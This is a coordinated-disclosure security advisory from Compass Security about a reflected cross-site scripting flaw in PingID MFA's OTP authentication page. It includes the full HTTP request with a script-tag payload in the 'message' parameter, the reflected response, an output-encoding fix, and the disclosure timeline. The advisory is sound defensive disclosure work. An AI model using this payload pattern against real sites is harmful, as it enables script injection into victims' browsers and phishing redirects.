PingID MFA Cross Site Scripting
Posted on 17 May 2017
############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: PingID (MFA) [1] # Vendor: Ping Identity Corporation # CSNC ID: CSNC-2017-013 # Subject: Reflected Cross-Site Scripting # Risk: High # Effect: Remotely exploitable # Author: Stephan Sekula <stephan.sekula@compass-security.com> # Date: 18.04.2017 # ############################################################# Introduction: ------------- With PingID MFA, you can easily control when your users need to authenticate with a second factor. You can configure your policies based upon the following: Group - Require MFA for members of a specific group. Application - Require MFA for specific applications. Geofence - Require MFA if the user is outside a pre-set geofence. Rooted or Jailbroken device - Require MFA if the user's device is rooted or jailbroken. Network IP - Require MFA if the device isn't in a specific IP range. PingID MFA delivers the granular security that your policies require with the ease of use your users want. [1] Compass Security discovered a web application security flaw in PingID's authentication process, which allows an attacker to manipulate the resulting website. This allows, for instance, attacking the user's browser or redirecting the user to a phishing website. Technical Description --------------------- During the authentication process, a message parameter is used, which can be manipulated. If this parameter contains JavaScript code, it is executed in the user's browser. Exploiting the vulnerability will lead to so-called Cross-Site Scripting (XSS), allowing the execution of JavaScript in the context of the victim. Request: POST /pingid/ppm/auth/otp HTTP/1.1 Host: authenticator.pingone.com [CUT] Referer: https://authenticator.pingone.com/pingid/ppm/auth/otp Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 44 otp=123456&message=<script>alert(0)</script> Response: HTTP/1.1 200 OK Date: Thu, 13 Apr 2017 11:21:45 GMT Server: Cache-Control: no-cache, no-store [CUT] Connection: close X-Content-Type-Options: nosniff Content-Length: 8313 <!DOCTYPE html> <html> <head> [CUT] </head> <body> [CUT] <div class="admin-message"><script>alert(0)</script></div> [CUT] </body> </html> Workaround / Fix: ----------------- The vendor has addressed the vulnerability. In general, this issue can be fixed by properly encoding all output, which is posted back to the user. For instance, using HTML encoding, to convert < to < and > to >. Timeline: --------- 2017-05-16: Coordinated public disclosure date 2017-05-03: Release of fixed version/patch 2017-04-20: Initial vendor response 2017-04-19: Initial vendor notification 2017-04-13: Discovery by Stephan Sekula References: ----------- [1] https://www.pingidentity.com/en/products/pingid.html